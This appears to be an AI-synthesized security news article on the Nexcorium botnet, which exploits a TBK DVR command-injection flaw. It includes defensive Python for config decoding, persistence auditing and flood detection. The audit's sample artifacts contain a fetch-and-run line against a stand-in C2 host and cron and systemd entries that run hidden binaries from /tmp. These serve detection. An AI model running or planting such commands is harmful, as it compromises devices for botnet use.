VYPR · breach · Published Apr 20, 2026 · Updated May 18, 2026 · 1 source

Nexcorium Botnet Exploits TBK DVR Command Injection to Build Multi-Architecture DDoS Army

FortiGuard Labs has uncovered a campaign exploiting CVE-2024-3721 in TBK DVR systems to deploy Nexcorium, a multi-architecture Mirai-based botnet targeting ARM, MIPS, and x86-64 devices for DDoS attacks.

FortiGuard Labs has identified an active malware campaign that exploits a command injection vulnerability in TBK digital video recorder (DVR) systems to deploy a new Mirai-based botnet named Nexcorium. The campaign targets CVE-2024-3721, a flaw in TBK DVR devices, allowing attackers to gain initial access and install malicious binaries tailored for ARM, MIPS, and x86-64 Linux architectures. The discovery highlights the continued weaponization of IoT devices for large-scale distributed denial-of-service (DDoS) attacks.

The attack chain begins with crafted HTTP requests that abuse vulnerable parameters in the DVR's web interface to execute a downloader script. This script retrieves architecture-specific Mirai variant binaries and executes them with elevated privileges. Evidence within the attack traffic includes a custom HTTP header referencing "Nexus Team," which analysts believe may point to a previously untracked threat actor. Upon successful infection, the malware announces control of the compromised system to its command-and-control (C2) server.

Once deployed, Nexcorium initializes a configuration set hidden through XOR encoding. This configuration includes C2 server details, attack instructions, and a built-in credential list used for brute-force activity. The malware closely mirrors traditional Mirai architecture, with dedicated modules for scanning, persistence, and attack execution. The scanner component attempts to propagate by exploiting known weaknesses and leveraging default credentials over Telnet connections. Among its embedded exploits is CVE-2017-17215, a vulnerability affecting Huawei routers, which expands its reach beyond the initial DVR targets.
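The XOR-hidden configuration described above is the kind of thing an analyst recovers first, because it yields the C2 host and the brute-force credential list. The following is an added example written for this article, not FortiGuard Labs' tooling or any Nexcorium code: it tries every single-byte XOR key against a config blob and keeps the key that produces the most well-formed NUL-separated printable strings (the leaked Mirai source applies its 4-byte table key byte by byte, which collapses to a single-byte XOR, so this approach covers the classic family). The blob, the key 0x37 and the strings inside it are constructed for the demonstration.

```python
"""Recover XOR-obscured configuration strings from a malware config blob.

Added example for analysts, not FortiGuard Labs' or the Nexcorium code.
Mirai-family samples keep their C2 host and credential list as a table of
NUL-terminated strings under a simple XOR. This tries all 256 single-byte
keys and keeps the one whose decoding yields the most NUL-separated,
fully printable tokens. The sample blob and its key are constructed.
"""
from __future__ import annotations

GRAPHIC = frozenset(range(0x20, 0x7F))  # printable ASCII, space through '~'


def xor_bytes(data: bytes, key: int) -> bytes:
    """Apply a single-byte XOR key to every byte."""
    return bytes(b ^ key for b in data)


def score_candidate(decoded: bytes) -> tuple[int, float]:
    """Rank a decoding: (count of NUL-separated all-printable tokens, printable ratio)."""
    tokens = [t for t in decoded.split(b"\x00") if t]
    valid = sum(1 for t in tokens if all(b in GRAPHIC for b in t))
    ratio = sum(1 for b in decoded if b in GRAPHIC or b == 0) / max(len(decoded), 1)
    return valid, ratio


def recover_key(blob: bytes) -> int:
    """Return the single-byte key whose decoding scores highest."""
    return max(range(256), key=lambda k: score_candidate(xor_bytes(blob, k)))


def extract_tokens(decoded: bytes, min_len: int = 3) -> list[str]:
    """Split on NUL and keep printable tokens of at least min_len characters."""
    return [
        t.decode("ascii")
        for t in decoded.split(b"\x00")
        if len(t) >= min_len and all(b in GRAPHIC for b in t)
    ]


def recover_config(blob: bytes) -> list[str]:
    """Key recovery followed by token extraction, as an analyst would script it."""
    return extract_tokens(xor_bytes(blob, recover_key(blob)))


# Constructed sample: a NUL-terminated string table obscured with a made-up key 0x37.
_SAMPLE_PLAIN = b"c2.example.invalid\x00/bin/busybox\x00root\x00admin\x00"
SAMPLE_KEY = 0x37
SAMPLE_BLOB = xor_bytes(_SAMPLE_PLAIN, SAMPLE_KEY)

if __name__ == "__main__":
    print(hex(recover_key(SAMPLE_BLOB)), recover_config(SAMPLE_BLOB))
```

Scoring by whole tokens rather than by raw printable ratio matters: several wrong keys map every byte of this table into printable ASCII, but only the true key also lands the NUL terminators in the right places, so the token count separates them where the ratio alone would tie.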

Persistence is achieved through several mechanisms. The malware modifies system initialization files, creates startup scripts, and registers system services to ensure execution after reboot. It also schedules recurring tasks via cron jobs, allowing it to survive system restarts and maintain long-term access. This multi-layered persistence strategy makes Nexcorium particularly difficult to eradicate from infected devices.
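Because the persistence layers listed above are all text artifacts on the device (cron tables, init and rc scripts, service units), they can be audited offline. The example below is added here and is not FortiGuard Labs' or the malware's code: it extracts the command part of each entry and flags commands that launch a program from a volatile or world-writable directory or that fetch and run a payload in one step. The file paths and contents are constructed samples; on a real device you would feed it the actual files.

```python
"""Audit common Linux persistence locations for entries typical of IoT botnet installs.

Added example, not FortiGuard Labs' or the malware's code. It reads the text of
cron tables, rc/init scripts and systemd units and flags commands that run a
program from a volatile or world-writable directory or that download and execute
in one step. Artifact paths and contents below are constructed samples.
"""
from __future__ import annotations

import re

# Program path under a directory that is volatile, world-writable, or both.
VOLATILE_PATH = re.compile(r"(?:^|[\s;|&(])(?:/tmp|/var/tmp|/dev/shm)/\S+")
# Changing into such a directory before running something from it.
VOLATILE_CD = re.compile(r"\bcd\s+(?:/tmp|/var/tmp|/dev/shm)(?=[\s;/]|$)")
# Fetch-then-run chains: wget/curl/tftp feeding a shell or chmod.
DOWNLOAD_EXEC = re.compile(r"\b(?:wget|curl|tftp)\b.*(?:\||;|&&).*\b(?:sh|bash|chmod)\b")


def extract_commands(kind: str, text: str) -> list[str]:
    """Pull the command part out of each non-comment line of a persistence artifact."""
    commands = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if kind == "cron":
            # @reboot/@hourly entries have one prefix field; normal entries have five.
            fields = 1 if line.startswith("@") else 5
            parts = line.split(None, fields)
            if len(parts) == fields + 1:
                commands.append(parts[fields])
        elif kind == "systemd":
            if line.startswith(("ExecStart=", "ExecStartPre=")):
                # strip systemd's executable-prefix characters such as '-' or '@'
                commands.append(line.split("=", 1)[1].lstrip("-@+!:"))
        else:  # rc.local, init.d script, profile: every remaining line is a command
            commands.append(line)
    return commands


def classify(command: str) -> list[str]:
    """Return the list of reasons a command looks like botnet persistence (empty if none)."""
    reasons = []
    if VOLATILE_PATH.search(command) or VOLATILE_CD.search(command):
        reasons.append("executes from volatile/world-writable directory")
    if DOWNLOAD_EXEC.search(command):
        reasons.append("download-and-execute chain")
    return reasons


def audit_persistence(artifacts: list[tuple[str, str, str]]) -> list[dict]:
    """artifacts: (kind, path, contents). Returns one finding per suspicious command."""
    findings = []
    for kind, path, text in artifacts:
        for command in extract_commands(kind, text):
            reasons = classify(command)
            if reasons:
                findings.append({"path": path, "command": command, "reasons": reasons})
    return findings


# Constructed sample artifacts (hypothetical paths and contents).
SAMPLE_ARTIFACTS = [
    ("cron", "/etc/crontabs/root",
     "# m h dom mon dow command\n"
     "0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf\n"
     "*/5 * * * * /tmp/.x86 >/dev/null 2>&1\n"
     "@reboot cd /dev/shm; ./.mips\n"),
    ("shell", "/etc/rc.local",
     "#!/bin/sh -e\n"
     "/usr/bin/watchdog-feed &\n"
     "wget http://c2.example.invalid/bins.sh -O- | sh\n"
     "exit 0\n"),
    ("systemd", "/etc/systemd/system/netsvc.service",
     "[Unit]\nDescription=Network Service\n"
     "[Service]\nExecStart=-/tmp/.arm7\n"
     "[Install]\nWantedBy=multi-user.target\n"),
]

if __name__ == "__main__":
    for f in audit_persistence(SAMPLE_ARTIFACTS):
        print(f"{f['path']}: {f['command']!r} -> {', '.join(f['reasons'])}")
```

The benign logrotate and watchdog entries pass untouched, while the four planted entries are reported with the reason that fired; extending the artifact list to `/etc/init.d/*`, `/etc/inittab` and per-user crontabs is just more tuples of the same shape.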

After establishing persistence, Nexcorium connects to a remote command server to receive instructions. It supports a wide range of DDoS methods, including UDP floods, TCP SYN floods, and application-layer attacks such as SMTP flooding. Attack commands are dynamically issued by the C2 infrastructure, enabling coordinated campaigns across infected devices. The malware can also terminate ongoing attacks or remove itself when instructed, suggesting centralized control over botnet operations.
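From the network side, a conscripted DVR running the UDP or SYN floods described above is easy to spot: it emits a burst of bare UDP datagrams or SYN-only segments toward one destination at a rate no camera or recorder legitimately produces. The following added example (not from FortiGuard Labs' report) runs a sliding-window rate check over constructed packet-summary records of the form a network sensor might export; the record format, the 1-second window and the 50-packet threshold are illustrative assumptions.

```python
"""Flag hosts on an IoT segment that are emitting UDP or SYN floods.

Added example, not from FortiGuard Labs' report. It consumes constructed
packet-summary records (time src dst dport proto flags) and reports sources
whose SYN-only or UDP packet rate toward a single destination exceeds a
threshold within a sliding window. Records are assumed time-ordered per
source/destination pair. Window, threshold and records are illustrative.
"""
from __future__ import annotations

from collections import defaultdict, deque


def parse_record(line: str) -> tuple[float, str, str, int, str, str]:
    """Parse 'ts src dst dport proto flags' into typed fields."""
    ts, src, dst, dport, proto, flags = line.split()
    return float(ts), src, dst, int(dport), proto, flags


def is_flood_candidate(proto: str, flags: str) -> bool:
    """SYN-only TCP segments and bare UDP datagrams are the flood primitives."""
    return proto == "udp" or (proto == "tcp" and flags == "S")


def detect_floods(lines: list[str], window: float = 1.0, threshold: int = 50) -> dict:
    """Return {(src, dst, proto): peak packets per window} for pairs over threshold."""
    windows: dict[tuple, deque] = defaultdict(deque)
    alerts: dict[tuple, int] = {}
    for line in lines:
        ts, src, dst, _dport, proto, flags = parse_record(line)
        if not is_flood_candidate(proto, flags):
            continue
        key = (src, dst, proto)
        q = windows[key]
        q.append(ts)
        while q and ts - q[0] > window:  # drop timestamps outside the window
            q.popleft()
        if len(q) >= threshold:
            alerts[key] = max(alerts.get(key, 0), len(q))
    return alerts


def sample_records() -> list[str]:
    """Constructed traffic: one benign camera, one flooding DVR, a few DNS lookups."""
    lines = []
    for i in range(20):  # camera streaming RTSP to its recorder: established TCP
        lines.append(f"{i * 0.5:.3f} 10.0.0.5 10.0.0.2 554 tcp PA")
    for i in range(200):  # infected DVR: 200 SYN-only segments to one victim in 0.4 s
        lines.append(f"{10 + i * 0.002:.3f} 10.0.0.9 203.0.113.7 80 tcp S")
    for i in range(5):  # occasional DNS: UDP, but far below the threshold
        lines.append(f"{20 + i:.3f} 10.0.0.5 10.0.0.1 53 udp -")
    return lines


if __name__ == "__main__":
    for (src, dst, proto), peak in detect_floods(sample_records()).items():
        print(f"flood from {src} to {dst} ({proto}): {peak} packets in window")
```

Keying on (source, destination, protocol) rather than on source alone keeps a busy but legitimate device from tripping the rule, and the SYN-only filter ignores the established-connection traffic a camera generates all day.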

The campaign underscores the persistent threat posed by IoT botnets. "Enterprises have had their fleets of IoT and OT devices used by Mirai and its variants for some time, particularly for DDoS attacks," said John Gallagher, vice president of Viakoo Labs. "Until more action is taken by enterprises to maintain cyber hygiene on IoT devices, this will continue because of the ease of infection and ability to move laterally." Security teams are advised to focus on foundational controls for IoT environments, including automated password and certificate management, firmware updates, and agentless discovery and remediation solutions.

The Nexcorium campaign serves as a stark reminder that unpatched IoT devices remain a prime vector for botnet recruitment. With the malware's ability to target multiple architectures and exploit both new and legacy vulnerabilities, organizations must prioritize IoT security to prevent their devices from being conscripted into DDoS armies.

Synthesized by Vypr AI